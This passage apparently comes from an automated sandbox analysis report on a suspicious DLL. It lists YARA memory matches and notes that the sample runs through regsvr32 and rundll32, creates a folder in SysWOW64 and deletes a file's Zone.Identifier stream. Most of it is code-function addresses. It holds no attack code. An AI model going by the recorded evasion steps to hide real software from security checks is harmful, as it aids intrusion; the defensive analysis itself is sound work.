Source: Yara match	File source: 0000000A.00000002.764384798.0000000005D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251269260.0000000004DB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764593172.0000000005FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.250801502.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251317536.0000000004E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763160491.00000000054F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251543763.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.254580749.0000000002791000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763467558.0000000005790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764153228.0000000005C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763888533.0000000005AA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763578627.0000000005870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763623141.00000000058A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.761812038.0000000003361000.00000020.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251440561.0000000004FC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.250842742.0000000003070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763204211.0000000005521000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.247153008.00000000026D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251348106.0000000005341000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763293110.0000000005601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.762842466.00000000036E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251435374.00000000053F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251474105.0000000004FF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.254179155.00000000023D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764675936.0000000006001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251540171.0000000005051000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251287174.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251612529.00000000051D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764435934.0000000005DA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763511347.00000000057C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251607526.0000000005481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763831341.0000000005A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764277951.0000000005CA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.761623893.0000000003330000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251214045.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763416711.0000000005761000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251508844.0000000005020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.762037427.0000000003480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763764045.00000000059C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251355041.0000000004E91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251487303.0000000005421000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763708229.0000000005990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251578591.00000000051A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763252082.00000000055D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763375282.0000000005730000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: M2hsMd9hTq.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Zxfif\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10020011	3_2_10020011
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100181CA	3_2_100181CA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001929D	3_2_1001929D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002542D	3_2_1002542D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100274AE	3_2_100274AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10026575	3_2_10026575
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001869D	3_2_1001869D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001178A	3_2_1001178A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10016860	3_2_10016860
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002596F	3_2_1002596F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10022A5C	3_2_10022A5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10018A71	3_2_10018A71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001AAB7	3_2_1001AAB7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001CB16	3_2_1001CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10018E7D	3_2_10018E7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10025EB1	3_2_10025EB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E85FF	3_2_040E85FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EEFDD	3_2_040EEFDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D3431	3_2_040D3431
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DA445	3_2_040DA445
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D7442	3_2_040D7442
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EA474	3_2_040EA474
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EDC71	3_2_040EDC71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D1CA1	3_2_040D1CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040ECCD9	3_2_040ECCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EE4E5	3_2_040EE4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EAD08	3_2_040EAD08
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E5515	3_2_040E5515
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E8D3D	3_2_040E8D3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E654A	3_2_040E654A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E7D5B	3_2_040E7D5B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F2D53	3_2_040F2D53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E3D85	3_2_040E3D85
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DC5D8	3_2_040DC5D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EC5D5	3_2_040EC5D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D55FF	3_2_040D55FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E9DF5	3_2_040E9DF5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D8636	3_2_040D8636
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DE640	3_2_040DE640
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E2E5D	3_2_040E2E5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D7E79	3_2_040D7E79
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E567B	3_2_040E567B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DDE74	3_2_040DDE74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E3EAA	3_2_040E3EAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F36AA	3_2_040F36AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E0EBC	3_2_040E0EBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F46BD	3_2_040F46BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DC6B8	3_2_040DC6B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F3EE9	3_2_040F3EE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EBEFD	3_2_040EBEFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DEF0C	3_2_040DEF0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D670B	3_2_040D670B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D1F38	3_2_040D1F38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EFF58	3_2_040EFF58
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E5779	3_2_040E5779
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E4F74	3_2_040E4F74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E9774	3_2_040E9774
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E0F86	3_2_040E0F86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E8FAE	3_2_040E8FAE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F07AA	3_2_040F07AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D77A3	3_2_040D77A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F17BD	3_2_040F17BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DBFBE	3_2_040DBFBE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D57B8	3_2_040D57B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DE7DE	3_2_040DE7DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E67E6	3_2_040E67E6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E27F9	3_2_040E27F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E07F4	3_2_040E07F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F2009	3_2_040F2009
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E8806	3_2_040E8806
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DB820	3_2_040DB820
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EF840	3_2_040EF840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D7078	3_2_040D7078
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DA871	3_2_040DA871
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D80C0	3_2_040D80C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040ED8DB	3_2_040ED8DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F00EF	3_2_040F00EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DF0E9	3_2_040DF0E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DD14C	3_2_040DD14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E2142	3_2_040E2142
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EE955	3_2_040EE955
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E017B	3_2_040E017B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E6187	3_2_040E6187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D2194	3_2_040D2194
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040ED1BC	3_2_040ED1BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EE1F8	3_2_040EE1F8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E7A0F	3_2_040E7A0F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E9A01	3_2_040E9A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E4244	3_2_040E4244
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EB257	3_2_040EB257
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E4A66	3_2_040E4A66
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F0A64	3_2_040F0A64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F3263	3_2_040F3263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DBAA9	3_2_040DBAA9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EA2A5	3_2_040EA2A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E0ABA	3_2_040E0ABA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040ECAD5	3_2_040ECAD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040F2B09	3_2_040F2B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E5333	3_2_040E5333
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DF369	3_2_040DF369
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040E437A	3_2_040E437A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D6B7A	3_2_040D6B7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D238C	3_2_040D238C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DFB8E	3_2_040DFB8E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040EFBDE	3_2_040EFBDE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040D4BFC	3_2_040D4BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10020011	4_2_10020011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100181CA	4_2_100181CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001929D	4_2_1001929D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002542D	4_2_1002542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100274AE	4_2_100274AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10026575	4_2_10026575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001869D	4_2_1001869D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001178A	4_2_1001178A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10016860	4_2_10016860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002596F	4_2_1002596F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10022A5C	4_2_10022A5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10018A71	4_2_10018A71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001AAB7	4_2_1001AAB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001CB16	4_2_1001CB16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10018E7D	4_2_10018E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10025EB1	4_2_10025EB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050185FF	4_2_050185FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501EFDD	4_2_0501EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501AD08	4_2_0501AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05015515	4_2_05015515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05018D3D	4_2_05018D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501654A	4_2_0501654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05022D53	4_2_05022D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05017D5B	4_2_05017D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05013D85	4_2_05013D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501C5D5	4_2_0501C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500C5D8	4_2_0500C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05019DF5	4_2_05019DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050055FF	4_2_050055FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05003431	4_2_05003431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05007442	4_2_05007442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500A445	4_2_0500A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501DC71	4_2_0501DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501A474	4_2_0501A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05001CA1	4_2_05001CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501CCD9	4_2_0501CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501E4E5	4_2_0501E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500670B	4_2_0500670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500EF0C	4_2_0500EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05001F38	4_2_05001F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501FF58	4_2_0501FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05014F74	4_2_05014F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05019774	4_2_05019774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05015779	4_2_05015779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05010F86	4_2_05010F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050077A3	4_2_050077A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050207AA	4_2_050207AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05018FAE	4_2_05018FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050057B8	4_2_050057B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500BFBE	4_2_0500BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050217BD	4_2_050217BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500E7DE	4_2_0500E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050167E6	4_2_050167E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050107F4	4_2_050107F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050127F9	4_2_050127F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05008636	4_2_05008636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500E640	4_2_0500E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05012E5D	4_2_05012E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500DE74	4_2_0500DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05007E79	4_2_05007E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501567B	4_2_0501567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050236AA	4_2_050236AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05013EAA	4_2_05013EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500C6B8	4_2_0500C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05010EBC	4_2_05010EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050246BD	4_2_050246BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05023EE9	4_2_05023EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501BEFD	4_2_0501BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05012142	4_2_05012142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500D14C	4_2_0500D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501E955	4_2_0501E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501017B	4_2_0501017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05016187	4_2_05016187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05002194	4_2_05002194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501D1BC	4_2_0501D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501E1F8	4_2_0501E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05018806	4_2_05018806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05022009	4_2_05022009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500B820	4_2_0500B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501F840	4_2_0501F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500A871	4_2_0500A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05007078	4_2_05007078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050080C0	4_2_050080C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501D8DB	4_2_0501D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500F0E9	4_2_0500F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_050200EF	4_2_050200EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05022B09	4_2_05022B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05015333	4_2_05015333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500F369	4_2_0500F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05006B7A	4_2_05006B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501437A	4_2_0501437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500238C	4_2_0500238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500FB8E	4_2_0500FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501FBDE	4_2_0501FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05004BFC	4_2_05004BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05019A01	4_2_05019A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05017A0F	4_2_05017A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05014244	4_2_05014244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501B257	4_2_0501B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05023263	4_2_05023263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05020A64	4_2_05020A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05014A66	4_2_05014A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501A2A5	4_2_0501A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500BAA9	4_2_0500BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05010ABA	4_2_05010ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0501CAD5	4_2_0501CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04867A0F	5_2_04867A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04872009	5_2_04872009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04858636	5_2_04858636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485A445	5_2_0485A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486B257	5_2_0486B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04864A66	5_2_04864A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485DE74	5_2_0485DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048717BD	5_2_048717BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486EFDD	5_2_0486EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485C5D8	5_2_0485C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048685FF	5_2_048685FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485670B	5_2_0485670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486AD08	5_2_0486AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04862142	5_2_04862142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486654A	5_2_0486654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486E955	5_2_0486E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486FF58	5_2_0486FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486A2A5	5_2_0486A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04851CA1	5_2_04851CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04863EAA	5_2_04863EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485BAA9	5_2_0485BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048736AA	5_2_048736AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048746BD	5_2_048746BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04860EBC	5_2_04860EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04860ABA	5_2_04860ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485C6B8	5_2_0485C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048580C0	5_2_048580C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486CAD5	5_2_0486CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486D8DB	5_2_0486D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486CCD9	5_2_0486CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0486E4E5	5_2_0486E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048700EF	5_2_048700EF
